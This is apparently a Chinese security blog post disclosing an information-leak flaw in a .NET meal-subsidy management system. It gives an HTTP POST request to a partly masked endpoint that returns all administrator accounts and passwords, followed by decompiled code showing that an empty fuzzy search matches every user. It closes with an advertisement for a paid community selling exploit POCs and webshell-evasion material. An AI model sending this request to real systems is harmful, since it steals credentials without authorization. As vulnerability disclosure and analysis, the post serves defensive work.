.NET 漏洞 | 某云餐补系统泄露账户密码

01阅读须知

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面

02漏洞背景

餐补管理系统是一款免安装的系统,配置好服务器后,商家、用户可随意在能上网的地方,在任何浏览器输入网址即可进入系统登录入口,系统利用最新的SQL SERVER技术,采用B/S结构,使用树形节点功能设计开发出这套成熟的消费系统。让操作人员工作起来更方便,更轻松。本系统有六大模块,分别是:常用功能、用户管理、资金管理、系统设置、系统管理、图表统计,另外还可扩展点餐、订餐、送餐管理模块。

图片

03漏洞复现

近日外部公开渠道爆出该系统的System**.as**接口存在敏感信息泄露漏洞,可导致攻击者获取后台管理员账户和密码。具体的数据包如下所示。

POST /System**.as** HTTP/1.1
Host: xx.xx.xx.xx
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36

page=1&arr_search=%7B%22username%22%3A%22%22%2C%22memo%22%3A%22%22%7D&funcName=get****

上述请求构造的POST请求,参数arr_search是一段URL编码的JSON字符串,包含了搜索参数,其中username和memo都是空字符串,发送请求后在页面返回显示所有的系统用户和密码等信息。如下图所示

图片

04漏洞分析

存在漏洞的是一个Handler,经过分析得知代码隐藏在New**.System**类名中,首先从HTTP请求的表单数据中获取arr_search参数,用JSON库进行解析,提取username和memo字段的值。

jo = JObject.Parse(context.Request.Form["arr_search"]);
string username = jo["username"].ToString();
string memo = jo["memo"].ToString();

接着,调用SystemMngBLL.getOperators方法,根据解析的username和memo参数查询数据,具体方法的实现代码如下所示。

public static DataSet getOperators(string name, string roles, int pageSize, int pageIndex)
{
    SqlParameter[] expr_06 = new SqlParameter[]
    {
        new SqlParameter("@name", "%" + name + "%"),
        new SqlParameter("@roles", roles)
    };
    string str = "select qx.*,people.people_name from qx,people where qx.people_node=people.people_node and 1=1";
    string statisticSql = "select count(1) userCount from qx where 1=1";
    string where = "";
    if (name != "")
    {
        where += " and username like @name";
    }
    if (roles != "")
    {
        where += " and qx.people_node in(select people_node from people where people_name=@roles)";
    }
    str += where;
    statisticSql += where;
    return SqlHelper.GetPageList(expr_06, str, "qx.people_node", pageSize, pageIndex, statisticSql);
}

方法内部据传入的参数name和roles,构建SQL查询条件,这里使用了参数化查询避免了SQL注入漏洞,但是此处却是模糊查询导致为空的情况下搜索出所有的用户敏感数据。

更多的.NET漏洞情报,星球可获取,星球持续更新最新的 .NET 应用漏洞POC,并在每年HW期间提供一手漏洞情报。这些POC/EXP涵盖了一些0day和1day漏洞,确保您始终掌握最前沿的安全信息和防护措施。

图片

 05.NET安全星球

星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。

图片

图片

图片

20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。

图片

我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。

图片

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值